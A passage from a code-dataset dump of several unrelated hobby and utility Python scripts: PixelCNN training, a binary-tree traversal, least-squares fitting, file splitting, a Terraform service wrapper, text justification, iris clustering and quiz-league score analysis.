metavar=\"BOOL\")\n parser.add_argument(\"--plot_model\", help=\"If True, plot a Keras model (using graphviz)\", type=str, metavar=\"BOOL\")\n\n args = parser.parse_args(remaining_argv)\n\n conditional = strtobool(args.conditional) if args.conditional else False\n try:\n dataset_name = args.dataset_name\n except:\n sys.exit(\"Error: --dataset_name must be specified.\")\n\n ### load keras dataset ###\n if dataset_name == 'mnist':\n from keras.datasets import mnist\n (X_train, h_train), (X_validation, h_validation) = mnist.load_data()\n input_size = (28, 28)\n nb_classes = 10\n nb_channels = 1\n elif dataset_name == 'cifar10':\n from keras.datasets import cifar10\n (X_train, h_train), (X_validation, h_validation) = cifar10.load_data()\n input_size = (32, 32)\n nb_classes = 10\n nb_channels = 3\n elif dataset_NAME == 'cifar100':\n from keras.datasets import cifar100\n (X_train, h_train), (X_validation, h_validation) = cifar100.load_data()\n input_size = (32, 32)\n nb_classes = 100\n nb_channels = 3\n\n utils = Utils()\n\n\n\n ### build PixelCNN model ###\n model_params = {}\n model_params['input_size'] = input_size\n model_params['nb_channels'] = nb_channels\n model_params['conditional'] = conditional\n if conditional:\n model_params['latent_dim'] = nb_classes\n if args.nb_pixelcnn_layers:\n model_params['nb_pixelcnn_layers'] = int(args.nb_pixelcnn_layers)\n if args.nb_filters:\n model_params['nb_filters'] = int(args.nb_filters)\n if args.filter_size_1st:\n model_params['filter_size_1st'] = tuple(map(int, args.filter_size_1st.split(',')))\n if args.filter_size:\n model_params['filter_size'] = tuple(map(int, args.filter_size.split(',')))\n if args.optimizer:\n model_params['optimizer'] = args.optimizer\n if args.es_patience:\n model_params['es_patience'] = int(args.patience)\n if args.save_best_only:\n model_params['save_best_only'] = strtobool(args.save_best_only)\n\n save_root = args.save_root if args.save_root else '/tmp/pixelcnn_'+dataset_name\n timezone = args.timezone if args.timezone else 'Asia/Tokyo'\n current_datetime = datetime.now(pytz.timezone(timezone)).strftime('%Y%m%d_%H%M%S')\n save_root = os.path.join(save_root, current_datetime)\n model_params['save_root'] = save_root\n\n if not os.path.exists(save_root):\n os.makedirs(save_root)\n\n try:\n nb_epoch = int(args.nb_epoch)\n batch_size = int(args.batch_size)\n except:\n sys.exit(\"Error: {--nb_epoch, --batch_size} must be specified.\")\n\n\n pixelcnn = PixelCNN(**model_params)\n pixelcnn.build_model()\n pixelcnn.model.summary()\n\n pixelcnn.print_train_parameters(save_root)\n pixelcnn.export_train_parameters(save_root)\n with open(os.path.join(save_root, 'parameters.txt'), 'a') as txt_file:\n txt_file.write('########## other options ##########\\n')\n txt_file.write('nb_epoch\\t: %s\\n' % nb_epoch)\n txt_file.write('batch_size\\t: %s\\n' % batch_size)\n txt_file.write('\\n')\n plot_model = strtobool(args.plot_model) if args.plot_model else True\n if plot_model:\n plot(pixelcnn.model, to_file=os.path.join(save_root, 'pixelcnn_model.png'))\n\n if conditional:\n train_generator = utils.build_data_generator_from_keras_datasets(dataset_name, X_train, h_train, batch_size)\n validation_generator = utils.build_data_generator_from_keras_datasets(dataset_name, X_validation, h_validation, batch_size)\n else:\n train_generator = utils.build_data_generator_from_keras_datasets(dataset_name, X_train, None, batch_size)\n validation_generator = utils.build_data_generator_from_keras_datasets(dataset_name, X_validation, None, batch_size)\n\n nb_train_samples = len(X_train)\n nb_validation_samples = len(X_validation)\n\n\n pixelcnn.fit_generator(\n train_generator=train_generator,\n samples_per_epoch=nb_train_samples,\n nb_epoch=nb_epoch,\n validation_data=validation_generator,\n nb_val_samples=nb_validation_samples)\n\n\n return (0)\n\n\nif __name__ == '__main__':\n sys.exit(train())\n","repo_name":"ldecamp/pixelcnn_keras","sub_path":"train_keras_datasets.py","file_name":"train_keras_datasets.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2478499849","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def levelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n result=[] # initialize empty list\n queue=[root] # append root into queue\n print(queue,\"queue\")\n while len(queue) > 0: # queue length > 0\n length = len(queue) # goes level by level\n level=[] # inner list\n for i in range(length): # range(0,length) starts with 0 and stops at given second element\n node = queue.pop(0)\n if node: \n level.append(node.val) \n if node.left : # if node is true and it has left\n queue.append(node.left) \n if node.right:\n queue.append(node.right) \n if len(level) > 0:\n result.append(level)\n return result\n ","repo_name":"thenunachi/dailyPracticeLeetCode","sub_path":"leetcode/trees/BinaryTreeLevelOrderTraversal.py","file_name":"BinaryTreeLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39806914373","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import leastsq ##引入最小二乘法算法\n\n'''\n 创建体重y,身高x\n'''\nYi = np.array([61, 57, 58, 40, 90, 35, 45])\nXi = np.array([170, 168, 175, 153, 185, 135, 172])\n\n\n'''\n 设定拟合函数和偏差函数\n 函数的形状确定过程:\n 1.先画样本图像\n 2.根据样本图像大致形状确定函数形式(直线、抛物线、正弦余弦等)\n'''\n\n##需要拟合的函数func :指定函数的形状\ndef func(p,x):\n k,b=p\n return k*x+b\n\n##偏差函数:x,y都是列表:这里的x,y更上面的Xi,Yi中是一一对应的\n# 我们的目标就是不断调整k和b使得error不断减小。\n# 这里的error函数和神经网络中常说的cost函数实际上是一回事,只不过这里更简单些而已。\ndef error(p,x,y):\n return func(p,x)-y\n\n'''\n 主要部分:附带部分说明\n 1.leastsq函数的返回值tuple,第一个元素是求解结果,第二个是求解的代价值(个人理解)\n 2.官网的原话(第二个值):Value of the cost function at the solution\n 3.实例:Para=>(array([ 0.61349535, 1.79409255]), 3)\n 4.返回值元组中第一个值的数量跟需要求解的参数的数量一致\n'''\n\n#k,b的初始值,可以任意设定,经过几次试验,发现p0的值会影响cost的值:Para[1]\n#p0里放的是k、b的初始值,这个值可以随意指定。\n# 往后随着迭代次数增加,k、b将会不断变化,使得error函数的值越来越小。\np0=[4,20]\n\n#把error函数中除了p0以外的参数打包到args中(使用要求)\nPara=leastsq(error,p0,args=(Xi,Yi))\n\n#读取结果\nk,b=Para[0]\nprint(\"k=\",k,\"b=\",b)\nprint(\"cost:\"+str(Para[1]))\nprint(\"求解的拟合直线为:\")\nprint(\"y=\"+str(round(k,2))+\"x+\"+str(round(b,2)))\n\n#p0=[0,0]\n#k= 0.9076449857973351 b= -95.00755623113787\n#cost:3\n#y=0.91x+-95.01\n\n#p0=[4,20]\n#k= 0.9076449912059097 b= -95.0075571180014\n#cost:1\n#y=0.91x+-95.01\n\n\n'''\n 绘图,看拟合效果.\n matplotlib默认不支持中文,label设置中文的话需要另行设置\n 如果报错,改成英文就可以\n'''\n\n#画样本点\nplt.figure(figsize=(8,6)) ##指定图像比例: 8:6\nplt.scatter(Xi,Yi,color=\"green\",label=\"样本数据\",linewidth=2)\n\n#画拟合直线\nx=np.linspace(0,200,100) ##在0-15直接画100个连续点\ny=k*x+b ##函数式\nplt.plot(x,y,color=\"red\",label=\"拟合直线\",linewidth=2)\nplt.legend(loc='lower right') #绘制图例\nplt.show()\n\n\n# R语言的summary\n# df = pd.DataFrame(y, x)\n# print(\"============================\")\n# # print(df.corr())\n# # print( df.info())\n# print(df.describe())\n# print(\"============================\")\n# print(\"Lower noise\", pearsonr(x, y))\n# print(\"Higher noise\", pearsonr(x, y))\n","repo_name":"liuyang19900520/ML_data","sub_path":"linearRegression&Logistic/ML2-1.py","file_name":"ML2-1.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71818835027","text":"from colorama import Fore\nimport os\nimport math\n\nBUF = 50*1024*1024*1024\n\n\ndef split_file(file, file_size, number_of_part, del_src):\n data = {}\n if file_size != 199 and number_of_part != 0:\n data[\"status\"] = 0\n data[\"content\"] = \"Failure - Cannot split file with both file_size and number_of_part\"\n return data\n\n if not os.path.isfile(file):\n current_dir = os.getcwd()\n file = current_dir + '/' + file\n if not os.path.isfile(file):\n data[\"status\"] = 0\n data[\"content\"] = \"Failure - File not exist\"\n return data\n\n if del_src != 0 and del_src != 1:\n data[\"status\"] = 0\n data[\"content\"] = \"Failure - Delete source file arg invalid\"\n return data\n\n chapters = 1\n if number_of_part != 0:\n if number_of_part <= 0:\n data[\"status\"] = 0\n data[\"content\"] = \"Failure - Number of part invalid\"\n return data\n\n file_size = os.path.getsize(file)\n max_size = file_size / number_of_part\n else:\n if file_size <= 0 or max_size > os.path.getsize(file):\n data[\"status\"] = 0\n data[\"content\"] = \"Failure - File size invalid\"\n return data\n max_size = file_size * 1024 - 1\n\n max_size = int(math.floor(max_size))\n temp = ''\n with open(file, 'rb') as src:\n while True:\n tgt = open(file + '.%03d' % chapters, 'wb')\n written = 0\n while written < max_size:\n if len(temp) > 0:\n tgt.write(temp)\n tgt.write(src.read(min(BUF, max_size - written)))\n written += min(BUF, max_size - written)\n temp = src.read(1)\n if len(temp) == 0:\n break\n tgt.close()\n if len(temp) == 0:\n break\n chapters += 1\n\n if del_src == 1:\n os.remove(file)\n\n data[\"status\"] = 1\n data[\"content\"] = \"split \" + str(chapters) + \" files\"\n return data\n\n\ndef print_result(data):\n status = data[\"status\"]\n content = data[\"content\"]\n if status == 1:\n print(Fore.GREEN + content)\n elif status == 0:\n print(Fore.RED + content)\n","repo_name":"duc010298/Transfer-File-Python","sub_path":"split/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2504829634","text":"import re\nfrom collections import namedtuple\nfrom typing import List, Dict\n\nfrom cloudshell.api.cloudshell_api import AttributeNameValue\n\nfrom cloudshell.iac.terraform.constants import ATTRIBUTE_NAMES\nfrom cloudshell.iac.terraform.models.shell_helper import ShellHelperObject\n\nTFVar = namedtuple('TFVar', ['name', 'value'])\n\n\nclass InputOutputService:\n def __init__(self, driver_helper: ShellHelperObject, inputs_map: Dict, outputs_map: Dict):\n self._driver_helper = driver_helper\n self._inputs_map = inputs_map\n self._outputs_map = outputs_map\n\n self._var_postfix_regex = re.compile(f\"{self._driver_helper.tf_service.cloudshell_model_name}\\.(.+)_tfvar\",\n re.IGNORECASE)\n\n def get_all_terrafrom_variables(self) -> List[TFVar]:\n # get variables from attributes that should be mapped to TF variables\n tf_vars = self.get_variables_from_tfvar_attributes()\n # get any additional TF variables from \"Terraform Inputs\" variable\n tf_vars.extend(self.get_variables_from_terraform_input_attribute())\n # get variables from explicitly mapped attributes\n tf_vars.extend(self.get_variables_from_explicitly_mapped_attributes())\n return tf_vars\n\n def get_variables_from_tfvar_attributes(self) -> List[TFVar]:\n \"\"\"\n Return list of TFVar based on attributes that end with \"_tfvar\" (case insensitive).\n Password attributes will be automatically decrypted\n \"\"\"\n result = []\n\n # find all attributes that end with \"_tfvar\"\n for attribute_name in self._driver_helper.tf_service.attributes:\n # add tf variable specific attributes to result\n m = re.match(self._var_postfix_regex, attribute_name)\n if m:\n # remove the prefix to get the TF variable name\n value = self._driver_helper.attr_handler.get_attribute(attribute_name)\n tf_var_value = self.try_decrypt_password(value)\n tf_var_name = m.group(1)\n\n result.append(TFVar(tf_var_name, tf_var_value))\n\n return result\n\n def get_variables_from_explicitly_mapped_attributes(self) -> List[TFVar]:\n \"\"\"\n Return list of TFVar objects based on \"inputs_map\" dictionary of attribute names to TF variable names.\n Attribute names anc TF variables names are case sensitive.\n Password attributes will be automatically decrypted.\n \"\"\"\n result = []\n self._driver_helper.logger.info(f\"inputs_map: {self._inputs_map}\")\n if not self._inputs_map:\n return result\n\n for attribute_name in self._inputs_map:\n if self._driver_helper.attr_handler.check_attribute_exist(attribute_name):\n attribute_value = self._driver_helper.attr_handler.get_attribute(attribute_name)\n attribute_value = self.try_decrypt_password(attribute_value)\n tf_var = self._inputs_map[attribute_name]\n result.append(TFVar(tf_var, attribute_value))\n else:\n raise ValueError(f\"Mapped attribute {attribute_name} doesn't exist on \"\n f\"service {self._driver_helper.tf_service.name}\")\n\n return result\n\n def get_variables_from_terraform_input_attribute(self) -> List[TFVar]:\n \"\"\"\n 'Terraform Inputs' is an optional attribute. The attribute is tests_helper_files CSV list of key=value.\n \"\"\"\n result = []\n tf_inputs_attr = self._driver_helper.attr_handler.get_attribute(ATTRIBUTE_NAMES.TF_INPUTS).strip()\n\n if tf_inputs_attr:\n for kvp in tf_inputs_attr.split(\",\"):\n name, value = kvp.strip().split(\"=\", 1)\n result.append(TFVar(name.strip(), value.strip()))\n\n return result\n\n def get_tags_from_custom_tags_attribute(self) -> Dict[str, str]:\n \"\"\"\n 'Custom Tags' is an optional attribute. The attribute is tests_helper_files CSV list of key=value.\n \"\"\"\n ct_inputs = self._driver_helper.attr_handler.get_attribute(ATTRIBUTE_NAMES.CT_INPUTS)\n result = {}\n\n if not ct_inputs:\n return result\n\n key_values = ct_inputs.split(\",\")\n\n for item in key_values:\n parts = item.split(\"=\")\n if len(parts) != 2:\n raise ValueError(\"Line must be comma-separated list of key=values: key1=val1,key2=val2...\")\n\n key = parts[0].strip()\n val = parts[1].strip()\n\n result[key] = val\n\n return result\n\n def try_decrypt_password(self, value: str) -> str:\n try:\n return self._driver_helper.api.DecryptPassword(value).Value\n except:\n return value\n\n def parse_and_save_outputs(self, unparsed_output_json: Dict) -> None:\n \"\"\"\n Parse the raw json from \"terraform output -json\" and update service attributes that are mapped to specific outputs.\n If \"Terraform Outputs\" attribute exist then save all unmapped outputs on this attribute\n \"\"\"\n # check if mapped output attributes exist in driver data model and if it does create an attribute update request\n attr_update_req = []\n unmaped_outputs = {}\n unmaped_sensitive_outputs = {}\n self._driver_helper.logger.info(f\"outputs_map: {self._outputs_map}\")\n\n for output in unparsed_output_json:\n regex = re.compile(f\"^{self._driver_helper.tf_service.cloudshell_model_name}\\.{output}_tfout$\",\n re.IGNORECASE)\n matched_attr_name = None\n for attr_name in self._driver_helper.tf_service.attributes:\n if re.match(regex, attr_name):\n matched_attr_name = attr_name\n break\n\n if matched_attr_name:\n attr_update_req.append(AttributeNameValue(matched_attr_name, unparsed_output_json[output]['value']))\n\n if self._is_explicitly_mapped_output(output):\n mapped_attr_name = self._driver_helper.attr_handler.\\\n get_2nd_gen_attribute_full_name(self._outputs_map[output])\n attr_update_req.append(\n AttributeNameValue(mapped_attr_name, unparsed_output_json[output]['value']))\n\n elif unparsed_output_json[output]['sensitive']:\n unmaped_sensitive_outputs[output] = unparsed_output_json[output]\n\n else:\n unmaped_outputs[output] = unparsed_output_json[output]\n\n # if TF OUTPUTS or TF SENSITIVE OUTPUTS attributes exists then we want to save all unmapped outputs\n # to this attributes\n tf_out_attr = f\"{self._driver_helper.tf_service.cloudshell_model_name}.{ATTRIBUTE_NAMES.TF_OUTPUTS}\"\n tf_sensitive_out_attr = f\"{self._driver_helper.tf_service.cloudshell_model_name}.\" \\\n f\"{ATTRIBUTE_NAMES.TF_SENSIITVE_OUTPUTS}\"\n\n if tf_out_attr in self._driver_helper.tf_service.attributes:\n # parse unmapped outputs\n output_string = self._parse_outputs_to_csv(unmaped_outputs)\n # prepare update request for unmapped attributes\n attr_update_req.append(AttributeNameValue(tf_out_attr, output_string))\n\n if tf_sensitive_out_attr in self._driver_helper.tf_service.attributes:\n # parse sensitive unmapped outputs\n sensitive_output_string = self._parse_outputs_to_csv(unmaped_sensitive_outputs)\n # prepare update request for sensitive unmapped attributes\n attr_update_req.append(AttributeNameValue(tf_sensitive_out_attr, sensitive_output_string))\n\n # send attribute update request using CS API\n if attr_update_req:\n self._driver_helper.api.SetServiceAttributesValues(self._driver_helper.sandbox_id,\n self._driver_helper.tf_service.name, attr_update_req)\n\n def _is_explicitly_mapped_output(self, output: str) -> bool:\n return self._outputs_map and output in self._outputs_map and \\\n self._driver_helper.attr_handler.check_2nd_gen_attribute_exist(self._outputs_map[output])\n\n def _parse_outputs_to_csv(self, outputs: Dict) -> str:\n output_string = []\n for output in outputs:\n output_string += [(output + '=' + str(outputs[output]['value']))]\n return \",\".join(output_string)\n","repo_name":"katzy687/CloudShell-Terraform-Shell","sub_path":"package/cloudshell/iac/terraform/services/input_output_service.py","file_name":"input_output_service.py","file_ext":"py","file_size_in_byte":8432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"14987024060","text":"import os\n\n#input and validation block\nwhile True:\n try:\n max_len_str = int(input('Please enter the maximum number of characters per line:'))\n except ValueError:\n print(\"Please, write down integer number\")\n continue\n\n if max_len_str >= 35 and max_len_str <=100:\n break\n \n elif max_len_str < 35:\n print('The number must be greater than 35')\n elif max_len_str > 100: \n print('The number must be less than 100')\n\n#open the file, read, #insert \\n every max_len_str index, but if in this index isn't ' ' find previous ' ' and store it\nwith open (\"text.txt\",'r', encoding='utf_8' ) as donor:\n with open (\"file1.txt\",'w', encoding='utf_8') as receiver:\n row = donor.read()\n row = list (row)\n i = max_len_str\n while i < len (row):\n while row[i] != ' ':\n i = i-1\n else:\n i=i\n row[i] = '\\n'\n i +=max_len_str+1\n \n receiver.writelines(row)\n \n#insert many spaces\nwith open (\"file1.txt\",'r', encoding='utf_8' ) as donor:\n with open (\"file2.txt\",'w', encoding='utf_8') as receiver: \n for x in donor:\n row=list(x)\n #count ' '. How many ' ' we have \n spaces = 0\n for i in row:\n if i == ' ':\n spaces +=1\n need = max_len_str - len(row)\n #indexes with ' '\n indexes = []\n ind = 0\n for i in row:\n if i == ' ':\n indexes.append(ind)\n ind +=1\n #count how many spaces we need insert\n if spaces>0:\n count_spaces = need//spaces\n else: \n count_spaces = need\n\n #insert spaces\n if need<= spaces:\n receiver.writelines(row)\n else: \n indexes_new = []\n\n y= 0\n\n for i in indexes:\n indexes_new.append(i+y)\n y+=count_spaces\n\n for i in indexes_new:\n y=0\n while y < count_spaces:\n row.insert (i, ' ')\n y+=1\n receiver.writelines(row)\n\n#insert additional spaces \nwith open (\"file2.txt\",'r', encoding='utf_8' ) as donor:\n with open (\"converted_text.txt\",'w', encoding='utf_8') as receiver: \n for x in donor:\n row=list(x)\n if len(x)==max_len_str+1:\n receiver.writelines(row)\n else: \n #count ' '. How many ' ' we have \n spaces = 0\n for i in row:\n if i == ' ':\n spaces +=1\n \n #how many ' ' we need\n need = max_len_str - len(row) +1\n\n #indexes with ' '\n indexes = []\n ind = 0\n for i in row:\n if i == ' ':\n indexes.append(ind)\n ind +=1 \n\n #calculate new indexes for insert\n indexes_new = [] \n y= 0\n for i in indexes:\n indexes_new.append(i+y)\n y+=1\n \n #leave only the necessary spaces\n indexes_new = indexes_new[0:(need)]\n for i in indexes_new:\n y=0\n row.insert (i, ' ')\n y+=1\n receiver.writelines(row)\n \n \n# remove additional files\nos.remove (\"file1.txt\")\nos.remove (\"file2.txt\")\n# tell users when they can find file \nprint (f\"We successfully have written new file. You can find it in {os.getcwd()}{os.sep}converted_text.txt\")","repo_name":"MikitaTsiarentsyeu/Md-PT1-50-22","sub_path":"Tasks/Bartosh/Task3/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"7658377447","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.font_manager as fm\nfrom sklearn.cluster import KMeans\nfrom sklearn import datasets\nfrom sklearn.metrics import fowlkes_mallows_score\n\n# 设置字体\nmyfont = fm.FontProperties(fname='ziti.TTF')\n# 聚类评分\ndef get_best_cluster(x):\n\tscores = []\n\tfor i in range(2, 7):\n\t\t# 构建并训练模型\n\t\tkmeans = KMeans(n_clusters = i, random_state=123).fit(x)\n\t\tscore = fowlkes_mallows_score(iris['target'], kmeans.labels_) # 实际分类与预测分类比较,计算得分\n\t\tscores.append(score)\n\t\tprint('iris数据聚{0}类FMI评价分值为:{1},SSE评分为:{2}'.format(str(i),str(score),str(kmeans.inertia_))) # SSE 作为辅助评分\n\n\t# 根据真实值评分,分3类的FMI评价最高,则最终非监督聚类3堆最合适\n\tmax_score_index = scores.index(max(scores))\n\tK = max_score_index + 2\n\tprint('分为:['+str(K)+\"] 类最合适\")\n\treturn K\n\n# 可视化显示\ndef disply_3d(X, model):\n\tlabels = model.labels_\n\tfig = plt.figure(\"花聚类\", figsize=(4, 3))\n\tax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n\tnp.random.seed(5)\n\tax.scatter(X[:, 3], X[:, 0], X[:, 2], c=labels.astype(np.float), edgecolor='k')\n\tax.w_xaxis.set_ticklabels([0.1, 0.3, 0.5, 0.7, 0.9, 1.3, 1.5, 1.7])\n\tax.w_yaxis.set_ticklabels([3, 4, 5, 6, 7, 8, 9, 10, 11, 12])\n\tax.w_zaxis.set_ticklabels([1, 2, 3, 4, 5, 6, 7, 8])\n\tax.set_xlabel('花瓣宽度', fontproperties=myfont)\n\tax.set_ylabel('萼片长度', fontproperties=myfont)\n\tax.set_zlabel('花瓣长度', fontproperties=myfont)\n\tax.set_title(\"共\"+str(set(labels))+\"类\", fontproperties=myfont)\n\tax.dist = 12\n\tplt.show()\n\n# 获取数据\niris = datasets.load_iris()\nX = iris.data\nK = get_best_cluster(X)\n\n# 训练模型\nmodel = KMeans(n_clusters=K)\nmodel.fit(X)\n\n# 预测数据\nx_test = np.array([[4, 3, 1, 0.2]])\ny_pre = model.predict(x_test)\n\n# 打印结果\nprint(\"测试组数据:\", x_test, \" 属于第:\", y_pre, \"类\")\n\n# 显示数据\ndisply_3d(X,model)\n","repo_name":"franklinxkk/machinelearning","sub_path":"iris_cluster.py","file_name":"iris_cluster.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"29102398247","text":"import os\nimport shutil\nimport re\nimport urllib.request\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom bs4 import BeautifulSoup\n\n\ndef get_season(season, league, rundle, division):\n matchday = 1\n div_string = f'_Div_{division}' if division else ''\n url = f'https://www.learnedleague.com/match.php?{season}&{matchday}&{rundle}_{league}{div_string}'\n fn = f'/Users/cda0201/personal/learnedleague/url.txt'\n urllib.request.urlretrieve(url, fn)\n\n file = open(fn, \"r\")\n contents = file.read()\n soup = BeautifulSoup(contents, 'html.parser')\n for data in soup.find_all(\"p\"):\n sum = data.get_text()\n print(sum)\n\ndef parse_match(match):\n data = match.split('\\t')\n pattern = re.compile('([^\\(])\\(([^\\)])\\)')\n scores = pattern.findall(data[2])\n\n a_mp = -1 if scores[0][1] is 'F' else int(scores[0][0])\n b_mp = -1 if scores[1][1] is 'F' else int(scores[1][0])\n a_pt = -1 if scores[0][1] is 'F' else 0\n b_pt = -1 if scores[1][1] is 'F' else 0\n a_ca = -1 if scores[0][1] is 'F' else int(scores[0][1])\n b_ca = -1 if scores[1][1] is 'F' else int(scores[1][1])\n if a_mp > b_mp:\n a_pt = 2\n elif b_mp > a_mp:\n b_pt = 2\n elif scores[0][1] is not 'F':\n a_pt = 1\n b_pt = 1\n match = ((data[1], a_ca, a_mp, a_pt),\n (data[3], b_ca, b_mp, b_pt))\n return match\n\n\ndef parse_matchday(matchday):\n matches = list(filter(None, matchday.split('\\n')))\n matches = [parse_match(match) for match in matches]\n return matches\n\n\ndef parse_data(data_fn):\n with open(data_fn, 'r') as h:\n txt = h.read()\n matchdays = list(filter(None, txt.split('\\n\\n')))\n matchdays = [parse_matchday(matchday) for matchday in matchdays]\n return matchdays\n\n\ndef luck(data_fn, player='DunnC4'):\n matchdays = parse_data(data_fn)\n\n n_matchdays = len(matchdays)\n n_players = len(matchdays[0])*2\n\n cas = np.zeros((n_matchdays, n_players - 1), dtype=int)\n mps = np.zeros((n_matchdays, n_players - 1), dtype=int)\n pts = np.zeros((n_matchdays, n_players - 1), dtype=int)\n player_cas = np.zeros((n_matchdays, ), dtype=int)\n player_cps = np.zeros((n_matchdays, ), dtype=int)\n player_mps = np.zeros((n_matchdays, ), dtype=int)\n player_pts = np.zeros((n_matchdays, ), dtype=int)\n opp_cas = np.zeros((n_matchdays, ), dtype=int)\n opp_mps = np.zeros((n_matchdays, ), dtype=int)\n opp_pts = np.zeros((n_matchdays, ), dtype=int)\n for d, matchday in enumerate(matchdays):\n ind = 0\n for match in matchday:\n for r, result in enumerate(match):\n if result[0] == player:\n player_cas[d] = result[1]\n player_mps[d] = result[2]\n player_pts[d] = result[3]\n opp_cas[d] = match[np.mod(r + 1, 2)][1]\n opp_mps[d] = match[np.mod(r + 1, 2)][2]\n opp_pts[d] = match[np.mod(r + 1, 2)][3]\n player_cps[d] = 2*(player_cas[d] > opp_cas[d]) + (player_cas[d] == opp_cas[d])*(player_cas[d] > -1) - (player_cas[d] == -1)\n else:\n cas[d, ind] = result[1]\n mps[d, ind] = result[2]\n pts[d, ind] = result[3]\n ind += 1\n\n cads = player_cas[:, np.newaxis] - cas\n mpds = player_mps[:, np.newaxis] - mps\n ptds = player_pts[:, np.newaxis] - pts\n opp_cads = player_cas - opp_cas\n opp_mpds = player_mps - opp_mps\n opp_ptds = player_pts - opp_pts\n\n ps = np.tile(player_cas[:, np.newaxis], (1, n_players - 1))\n os = cas\n cad_points = 2*(ps > os) + (ps == os)*(ps > -1) - (ps < 0)\n\n ps = np.tile(player_mps[:, np.newaxis], (1, n_players - 1))\n os = mps\n mpd_points = 2*(ps > os) + (ps == os)*(ps > -1) - (ps < 0)\n\n\n fg, axs = plt.subplots(ncols=4, nrows=n_matchdays, figsize=(12, 8))\n sources = [cads, cad_points, mpds, mpd_points]\n opp_sources = [opp_cads, player_cps, opp_mpds, player_pts]\n source_labels = ['Correct Answer Difference (opp <-> me)',\n 'Points based on Correct Answers',\n 'Match Point Difference (opp <-> me)',\n 'Points']\n source_ranges = [[-7, 7], [-1, 2], [-10, 10], [-1, 2]]\n source_colors = ['k', 'dimgrey', 'b', 'g']\n\n ofg, oaxs = plt.subplots(nrows=4, figsize=(8, 16))\n for s in range(len(sources)):\n max_count = -np.inf\n bin_edges = np.arange(source_ranges[s][0], source_ranges[s][1] + 2) - .5\n counts = np.zeros((n_matchdays, len(bin_edges) - 1), dtype=int)\n ds = sources[s]\n overall_d = np.ones((1, ))\n for d, ax in enumerate(axs[:, s]):\n counts[d, :], bins, patches = ax.hist(ds[d, :], bins=bin_edges, edgecolor='white', linewidth=1)\n\n for i in range(0, opp_sources[s][d] - source_ranges[s][0]):\n patches[i].set_facecolor(source_colors[s])\n patches[opp_sources[s][d] - source_ranges[s][0]].set_facecolor('r')\n for i in range(opp_sources[s][d] - source_ranges[s][0] + 1, len(patches)):\n patches[i].set_facecolor(source_colors[s])\n\n ax.set_xlim([source_ranges[s][0] - 1, source_ranges[s][1] + 1])\n if d == n_matchdays - 1:\n if s == 0 or s == 2:\n ax.set_xticks(np.arange(source_ranges[s][0] + 1, source_ranges[s][1])[::2])\n else:\n ax.set_xticks(np.arange(source_ranges[s][0], source_ranges[s][1] + 1))\n ax.set_xlabel(source_labels[s])\n else:\n ax.set_xticks([0, ])\n ax.tick_params(\n axis='x', # changes apply to the x-axis\n which='both', # both major and minor ticks are affected\n labelbottom=False) # labels along the bottom edge are off\n if s == 1 and d == 0:\n ax.set_title(player)\n if s == 0:\n ax.set_ylabel(f'MD {d+1}')\n max_count = np.maximum(np.max(counts[d, :]), max_count)\n overall_d = np.convolve(overall_d, counts[d, :])\n\n bext = [source_ranges[s][0] * n_matchdays, source_ranges[s][1] * n_matchdays]\n _, _, patches = oaxs[s].hist(np.arange(bext[0], bext[1] + 1), weights=overall_d,\n bins=np.arange(bext[0], bext[1] + 2) - .5, edgecolor='white', linewidth=1, density=True)\n\n red_val = np.sum(opp_sources[s])\n red_ind = np.argmax(np.arange(bext[0], bext[1] + 1) == red_val)\n for i in range(0, red_ind):\n patches[i].set_facecolor(source_colors[s])\n patches[red_ind].set_facecolor('r')\n for i in range(red_ind + 1, len(patches)):\n patches[i].set_facecolor(source_colors[s])\n\n if s == 0 or s == 2:\n trim = np.minimum(np.argmax(overall_d > 0), np.argmax(overall_d[::-1] > 0))\n bext = [bext[0] + trim, bext[1] - trim]\n oaxs[s].set_xlim([bext[0] - 1, bext[1] + 1])\n else:\n oaxs[s].set_xlim([bext[0] - 1, bext[1] + 1])\n\n oaxs[s].set_xlabel(source_labels[s])\n if s == 0:\n oaxs[s].set_title(player)\n # ofg.savefig(f'/Users/cda0201/personal/learnedleague/{player}_overall_{s}_{d}.png')\n\n for ax in axs[:, s]:\n ax.set_ylim([0, max_count + 1])\n\n ofg.savefig(f'/Users/cda0201/personal/learnedleague/{player}_overall.png')\n\n fg.savefig(f'/Users/cda0201/personal/learnedleague/{player}.png')\n\n return\n\nif __name__ == '__main__':\n\n season = 92\n rundle = 'D'\n division = 1\n league = 'Citadel'\n get_season(season, league, rundle, division)\n\n season = 92\n rundle = 'D'\n data_fn = f'/Users/cda0201/personal/learnedleague/LL{season}_{rundle}'\n players = ['DunnC4', 'CampbellJC', 'LouJ', 'Watson JrJ']\n for player in players:\n luck(data_fn, player)\n\n season = 92\n rundle = 'B'\n data_fn = f'/Users/cda0201/personal/learnedleague/LL{season}_{rundle}'\n players = ['DunnGreg']\n for player in players:\n luck(data_fn, player)\n\n season = 92\n rundle = 'C2'\n data_fn = f'/Users/cda0201/personal/learnedleague/LL{season}_{rundle}'\n players = ['WatsonJ3', 'WatsonL3']\n for player in players:\n luck(data_fn, player)\n\n # season = 86\n # rundle 